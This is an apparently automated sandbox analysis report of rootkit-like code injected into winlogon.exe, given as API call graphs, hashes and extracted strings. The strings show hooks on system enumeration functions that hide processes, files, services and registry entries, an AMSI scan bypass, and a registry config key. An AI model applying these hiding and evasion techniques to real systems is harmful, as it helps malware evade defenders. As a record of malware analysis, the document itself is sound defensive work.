                                  Total number of Nodes:136
                                  Total number of Limit Nodes:17
                                  execution_graph 17140 2e99175f370 VirtualProtect 17141 2e991755c8d 17143 2e991755c94 17141->17143 17142 2e991755cfb 17143->17142 17144 2e991755d77 VirtualProtect 17143->17144 17145 2e991755db1 17144->17145 17146 2e991755da3 GetLastError 17144->17146 17146->17145 17147 2e991752c80 TlsGetValue TlsGetValue TlsGetValue 17148 2e991752cd9 17147->17148 17149 2e991752d51 NtEnumerateValueKey 17147->17149 17148->17149 17152 2e991752ce1 17148->17152 17150 2e991752d86 17149->17150 17151 2e991752d4c 17149->17151 17150->17151 17154 2e991752da0 NtEnumerateValueKey 17150->17154 17155 2e991752e06 TlsSetValue TlsSetValue TlsSetValue 17150->17155 17157 2e991753f88 StrCmpNIW 17150->17157 17152->17151 17153 2e991752d2d NtEnumerateValueKey 17152->17153 17152->17155 17158 2e991753f88 17152->17158 17153->17151 17153->17152 17154->17150 17155->17151 17157->17150 17159 2e991753f95 StrCmpNIW 17158->17159 17160 2e991753faa 17158->17160 17159->17160 17160->17152 17161 2e991756430 17162 2e99175643d 17161->17162 17163 2e991756449 17162->17163 17166 2e99175655a 17162->17166 17164 2e99175647e 17163->17164 17165 2e9917564cd 17163->17165 17167 2e9917564a6 SetThreadContext 17164->17167 17168 2e991756581 VirtualProtect FlushInstructionCache 17166->17168 17170 2e99175663e 17166->17170 17167->17165 17168->17166 17169 2e99175665e 17183 2e991755530 GetCurrentProcess 17169->17183 17170->17169 17179 2e991754b20 17170->17179 17173 2e991756663 17174 2e9917566b7 17173->17174 17175 2e991756677 ResumeThread 17173->17175 17187 2e991758070 17174->17187 17176 2e9917566ab 17175->17176 17176->17173 17181 2e991754b3c 17179->17181 17180 2e991754b9f 17180->17169 17181->17180 17182 2e991754b52 VirtualFree 17181->17182 17182->17181 17184 2e99175554c 17183->17184 17185 2e991755562 VirtualProtect FlushInstructionCache 17184->17185 17186 2e991755593 17184->17186 17185->17184 17186->17173 17188 2e991758079 17187->17188 17189 2e9917566ff 17188->17189 17190 2e991758848 IsProcessorFeaturePresent 17188->17190 17191 2e991758860 17190->17191 17196 2e99175891c RtlCaptureContext 17191->17196 17197 2e991758936 RtlLookupFunctionEntry 17196->17197 17198 2e99175894c RtlVirtualUnwind 17197->17198 17199 2e991758873 17197->17199 17198->17197 17198->17199 17200 2e991758814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17199->17200 17201 2e9917541f9 17204 2e991754146 _invalid_parameter_noinfo 17201->17204 17202 2e9917541b0 17203 2e991754196 VirtualQuery 17203->17202 17203->17204 17204->17202 17204->17203 17205 2e9917541ca VirtualAlloc 17204->17205 17205->17202 17206 2e9917541fb GetLastError 17205->17206 17206->17202 17206->17204 17207 2e991751e3c LoadLibraryA GetProcAddress 17208 2e991751e6f 17207->17208 17209 2e991751e62 SleepEx 17207->17209 17209->17209 17210 2e991751bc4 17217 2e991751724 GetProcessHeap HeapAlloc 17210->17217 17212 2e991751bda SleepEx 17213 2e991751724 50 API calls 17212->17213 17215 2e991751bd3 17213->17215 17215->17212 17216 2e99175159c StrCmpIW StrCmpW 17215->17216 17268 2e9917519b0 17215->17268 17216->17215 17285 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17217->17285 17219 2e99175174c 17286 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17219->17286 17221 2e991751754 17287 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17221->17287 17223 2e99175175d 17288 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17223->17288 17225 2e991751766 17289 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17225->17289 17227 2e99175176f 17290 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17227->17290 17229 2e991751778 17291 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17229->17291 17231 2e991751781 17292 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17231->17292 17233 2e99175178a RegOpenKeyExW 17234 2e9917517bc RegOpenKeyExW 17233->17234 17235 2e9917519a2 17233->17235 17236 2e9917517fb RegOpenKeyExW 17234->17236 17237 2e9917517e5 17234->17237 17235->17215 17239 2e99175181f 17236->17239 17240 2e991751836 RegOpenKeyExW 17236->17240 17299 2e9917512b8 RegQueryInfoKeyW 17237->17299 17293 2e99175104c RegQueryInfoKeyW 17239->17293 17241 2e99175185a 17240->17241 17242 2e991751871 RegOpenKeyExW 17240->17242 17246 2e9917512b8 16 API calls 17241->17246 17247 2e9917518ac RegOpenKeyExW 17242->17247 17248 2e991751895 17242->17248 17249 2e991751867 RegCloseKey 17246->17249 17251 2e9917518d0 17247->17251 17252 2e9917518e7 RegOpenKeyExW 17247->17252 17250 2e9917512b8 16 API calls 17248->17250 17249->17242 17253 2e9917518a2 RegCloseKey 17250->17253 17254 2e9917512b8 16 API calls 17251->17254 17255 2e99175190b 17252->17255 17256 2e991751922 RegOpenKeyExW 17252->17256 17253->17247 17259 2e9917518dd RegCloseKey 17254->17259 17260 2e99175104c 6 API calls 17255->17260 17257 2e99175195d RegOpenKeyExW 17256->17257 17258 2e991751946 17256->17258 17263 2e991751998 RegCloseKey 17257->17263 17264 2e991751981 17257->17264 17262 2e99175104c 6 API calls 17258->17262 17259->17252 17261 2e991751918 RegCloseKey 17260->17261 17261->17256 17265 2e991751953 RegCloseKey 17262->17265 17263->17235 17266 2e99175104c 6 API calls 17264->17266 17265->17257 17267 2e99175198e RegCloseKey 17266->17267 17267->17263 17313 2e9917514a0 17268->17313 17285->17219 17286->17221 17287->17223 17288->17225 17289->17227 17290->17229 17291->17231 17292->17233 17294 2e9917510bf 17293->17294 17295 2e9917511b5 RegCloseKey 17293->17295 17294->17295 17296 2e9917510cf RegEnumValueW 17294->17296 17295->17240 17298 2e991751125 17296->17298 17297 2e99175114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 17297->17298 17298->17295 17298->17296 17298->17297 17300 2e991751486 RegCloseKey 17299->17300 17301 2e991751323 GetProcessHeap HeapAlloc 17299->17301 17300->17236 17302 2e99175134e RegEnumValueW 17301->17302 17303 2e991751472 GetProcessHeap HeapFree 17301->17303 17304 2e9917513a1 17302->17304 17303->17300 17304->17302 17304->17303 17306 2e9917513cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 17304->17306 17307 2e99175141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 17304->17307 17308 2e991751530 17304->17308 17306->17307 17307->17304 17309 2e99175154a 17308->17309 17312 2e991751580 17308->17312 17310 2e991751569 StrCmpW 17309->17310 17311 2e991751561 StrCmpIW 17309->17311 17309->17312 17310->17309 17311->17309 17312->17304 17314 2e9917514e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 17313->17314 17315 2e9917514c2 GetProcessHeap HeapFree 17313->17315 17315->17314 17315->17315

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Value$Enumerate
                                  • String ID:
                                  • API String ID: 3520290360-0
                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                  • Instruction ID: 7084a0f37388f17c72d4b5abeb6984904817b407f2e493edf204947e4454237c
                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                  • Instruction Fuzzy Hash: 44519C36744682CBE765CB17E448A5AB3A4F788B84F52411EDE4A43B96DF38C8C5CF60

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                  • API String ID: 2135414181-3414887735
                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction ID: 0ab6ae7007cd32200ddd34f9a04970f5b3cbd55e20ea4a88b4426b03dcbe59b1
                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction Fuzzy Hash: 49712D26350A9285EB109F77E8586993364FB84BC9F42111BDD4E97B2ADF34C484DB50

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                  • API String ID: 1735320900-4225371247
                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction ID: 76a0498010ae52e56ac533efc0b51d2484dcf11980dddfd0e30f021bb9a1078f
                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction Fuzzy Hash: CE51ADA4190ACBE6FB00DFA6EC4D7D43360B710394F82451B941A82567DF7882DACB72

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                  • API String ID: 740688525-1880043860
                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                  • Instruction ID: d3b19a32b1d02c4b2adee47c79233e5846249729570d65564c58c69d92baebb5
                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                  • Instruction Fuzzy Hash: 4A51E42174178691FE559B67E8083A93390BB49BF0F5A0B2E9E3D473C2DF38C485CA61

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 151 2e991756270-2e991756297 152 2e991756299-2e9917562a8 151->152 153 2e9917562ab-2e9917562b6 GetCurrentThreadId 151->153 152->153 154 2e9917562b8-2e9917562bd 153->154 155 2e9917562c2-2e9917562c9 153->155 156 2e9917566ef-2e991756706 call 2e991758070 154->156 157 2e9917562db-2e9917562ef 155->157 158 2e9917562cb-2e9917562d6 call 2e9917560a0 155->158 161 2e9917562fe-2e991756304 157->161 158->156 164 2e99175630a-2e991756313 161->164 165 2e9917563d5-2e9917563f6 161->165 167 2e99175635a-2e9917563cd call 2e991754c50 call 2e991754bf0 call 2e991754bb0 164->167 168 2e991756315-2e991756358 call 2e991763a40 164->168 170 2e99175655f-2e991756570 call 2e991757bff 165->170 171 2e9917563fc-2e99175641c GetThreadContext 165->171 181 2e9917563d0 167->181 168->181 185 2e991756575-2e99175657b 170->185 174 2e99175655a 171->174 175 2e991756422-2e991756443 171->175 174->170 175->174 184 2e991756449-2e991756452 175->184 181->161 189 2e9917564d2-2e9917564e3 184->189 190 2e991756454-2e991756465 184->190 186 2e99175663e-2e99175664e 185->186 187 2e991756581-2e9917565d8 VirtualProtect FlushInstructionCache 185->187 196 2e99175665e-2e99175666a call 2e991755530 186->196 197 2e991756650-2e991756657 186->197 191 2e9917565da-2e9917565e4 187->191 192 2e991756609-2e991756639 call 2e991757fdc 187->192 193 2e991756555 189->193 194 2e9917564e5-2e991756503 189->194 198 2e9917564cd 190->198 199 2e991756467-2e99175647c 190->199 191->192 200 2e9917565e6-2e991756601 call 2e991754ad0 191->200 192->185 194->193 201 2e991756505-2e991756550 call 2e991754040 call 2e991757c1d 194->201 215 2e99175666f-2e991756675 196->215 197->196 203 2e991756659 call 2e991754b20 197->203 198->193 199->198 205 2e99175647e-2e9917564c8 call 2e9917540b0 SetThreadContext 199->205 200->192 201->193 203->196 205->198 216 2e9917566b7-2e9917566d5 215->216 217 2e991756677-2e9917566b5 ResumeThread call 2e991757fdc 215->217 220 2e9917566e9 216->220 221 2e9917566d7-2e9917566e6 216->221 217->215 220->156 221->220
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Thread$Current$Context
                                  • String ID:
                                  • API String ID: 1666949209-0
                                  • Opcode ID: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                                  • Instruction ID: e8e1c5825070d25c47f8a2906e98e4307dfcee1d7df6d39934281bedaf282634
                                  • Opcode Fuzzy Hash: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                                  • Instruction Fuzzy Hash: B4D18E76248B8982DA70DB16E49835A77B4F3C8B88F51011AEACD47766DF3DC591CF10

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 223 2e991751e3c-2e991751e60 LoadLibraryA GetProcAddress 224 2e991751e6f-2e991751e73 223->224 225 2e991751e62-2e991751e6d SleepEx 223->225 225->225
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProcSleep
                                  • String ID: AmsiScanBuffer$amsi.dll
                                  • API String ID: 188063004-3248079830
                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction ID: 4de2bd28166c77eb20bda3f9c33f4c777e2e109d77ac18827b03cbf5d6d45b7a
                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction Fuzzy Hash: 62D067206916C2D5EA086B13E85C3543262BB68BC2FD6441FC50E852A6DF3D85D9AB72

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 226 2e991755810-2e99175583c 227 2e99175583e-2e991755846 226->227 228 2e99175584d-2e991755856 226->228 227->228 229 2e991755858-2e991755860 228->229 230 2e991755867-2e991755870 228->230 229->230 231 2e991755872-2e99175587a 230->231 232 2e991755881-2e99175588a 230->232 231->232 233 2e99175588c-2e991755891 232->233 234 2e991755896-2e9917558a1 GetCurrentThreadId 232->234 235 2e991755e13-2e991755e1a 233->235 236 2e9917558ad-2e9917558b4 234->236 237 2e9917558a3-2e9917558a8 234->237 238 2e9917558b6-2e9917558bc 236->238 239 2e9917558c1-2e9917558ca 236->239 237->235 238->235 240 2e9917558cc-2e9917558d1 239->240 241 2e9917558d6-2e9917558e2 239->241 240->235 242 2e99175590e-2e991755965 call 2e991755e20 * 2 241->242 243 2e9917558e4-2e991755909 241->243 248 2e99175597a-2e991755983 242->248 249 2e991755967-2e99175596e 242->249 243->235 250 2e991755995-2e99175599e 248->250 251 2e991755985-2e991755992 248->251 252 2e991755970 249->252 253 2e991755976 249->253 254 2e9917559a0-2e9917559b0 250->254 255 2e9917559b3-2e9917559d8 call 2e991757fa0 250->255 251->250 256 2e9917559f0-2e9917559f6 252->256 253->248 257 2e9917559e6-2e9917559ea 253->257 254->255 267 2e9917559de 255->267 268 2e991755a6d-2e991755a82 call 2e991754400 255->268 258 2e991755a25-2e991755a2b 256->258 259 2e9917559f8-2e991755a14 call 2e991754ad0 256->259 257->256 262 2e991755a2d-2e991755a4c call 2e991757fdc 258->262 263 2e991755a55-2e991755a68 258->263 259->258 270 2e991755a16-2e991755a1e 259->270 262->263 263->235 267->257 273 2e991755a91-2e991755a9a 268->273 274 2e991755a84-2e991755a8c 268->274 270->258 275 2e991755aac-2e991755afa call 2e9917640e0 273->275 276 2e991755a9c-2e991755aa9 273->276 274->257 279 2e991755b02-2e991755b0a 275->279 276->275 280 2e991755b10-2e991755bfb call 2e991757b80 279->280 281 2e991755c17-2e991755c1f 279->281 293 2e991755bfd 280->293 294 2e991755bff-2e991755c0e call 2e9917547a0 280->294 282 2e991755c21-2e991755c34 call 2e991754cd0 281->282 283 2e991755c63-2e991755c6b 281->283 297 2e991755c36 282->297 298 2e991755c38-2e991755c61 282->298 286 2e991755c6d-2e991755c75 283->286 287 2e991755c77-2e991755c86 283->287 286->287 290 2e991755c94-2e991755ca1 286->290 291 2e991755c8f 287->291 292 2e991755c88 287->292 295 2e991755ca4-2e991755cf9 call 2e991763a40 290->295 296 2e991755ca3 290->296 291->290 292->291 293->281 302 2e991755c10 294->302 303 2e991755c12 294->303 305 2e991755cfb-2e991755d03 295->305 306 2e991755d08-2e991755da1 call 2e991754c50 call 2e991754bb0 VirtualProtect 295->306 296->295 297->283 298->281 302->281 303->279 311 2e991755db1-2e991755e11 306->311 312 2e991755da3-2e991755da8 GetLastError 306->312 311->235 312->311
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID:
                                  • API String ID: 2882836952-0
                                  • Opcode ID: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                  • Instruction ID: 52951e6c7c0ac7a58361e99da30745c70ef6aa9fb656079d2de6e576f5462f06
                                  • Opcode Fuzzy Hash: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                  • Instruction Fuzzy Hash: C102D932259BC586EBA0CB56F49435AB7A0F3C5794F11411AEA8E87BA9DF7CC484CF10

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                  • String ID:
                                  • API String ID: 1092925422-0
                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                  • Instruction ID: dc7190347fc8dda5a5d134a6bec94dfc7c1510c5a7a9bf88f429bef67aba9473
                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                  • Instruction Fuzzy Hash: 2A11422674578293EB248B62E40821A67B0FB44BC0F05002BEE8D437A5EB7DC994CBA5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd
                                  Similarity
                                  • API ID: Virtual$Protect$AllocLibraryLoad
                                  • String ID:
                                  • API String ID: 3316853933-0
                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction ID: 51f8cee34b878b4538d56e3401ee481ec8ff1a74f599eb14aabb1b4cca860292
                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction Fuzzy Hash: 78915C727426D287EB608F26D404B7D73A1F748BA4F56852A9F4907789DA38D883CB30

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocQuery
                                  • String ID:
                                  • API String ID: 31662377-0
                                  • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                  • Instruction ID: c949b42a060b6651e1e42dc03c64814b10480f49836834b788f6646c404d4bf6
                                  • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                  • Instruction Fuzzy Hash: 5B31522225DAC581EA32DB16E45831E62A4F3897C4F51052EF5CE46BAAEF3CC5C08F60

                                  Control-flow Graph

                                  APIs
                                  • GetModuleFileNameW.KERNEL32 ref: 000002E991753A35
                                  • PathFindFileNameW.SHLWAPI ref: 000002E991753A44
                                    • Part of subcall function 000002E991753F88: StrCmpNIW.SHLWAPI(?,?,?,000002E99175272F), ref: 000002E991753FA0
                                    • Part of subcall function 000002E991753EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002E991753A5B), ref: 000002E991753EDB
                                    • Part of subcall function 000002E991753EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F0E
                                    • Part of subcall function 000002E991753EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F2E
                                    • Part of subcall function 000002E991753EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F47
                                    • Part of subcall function 000002E991753EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F68
                                  • CreateThread.KERNELBASE ref: 000002E991753A8B
                                    • Part of subcall function 000002E991751E74: GetCurrentThread.KERNEL32 ref: 000002E991751E7F
                                    • Part of subcall function 000002E991751E74: CreateThread.KERNELBASE ref: 000002E991752043
                                    • Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E991752049
                                    • Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E991752055
                                    • Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E991752061
                                    • Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E99175206D
                                    • Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E991752079
                                    • Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E991752085
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                  • String ID:
                                  • API String ID: 2779030803-0
                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                  • Instruction ID: 4bd71f118c44520fda5d2355f50583d8b46b91604126fff33060b823f2b4427d
                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
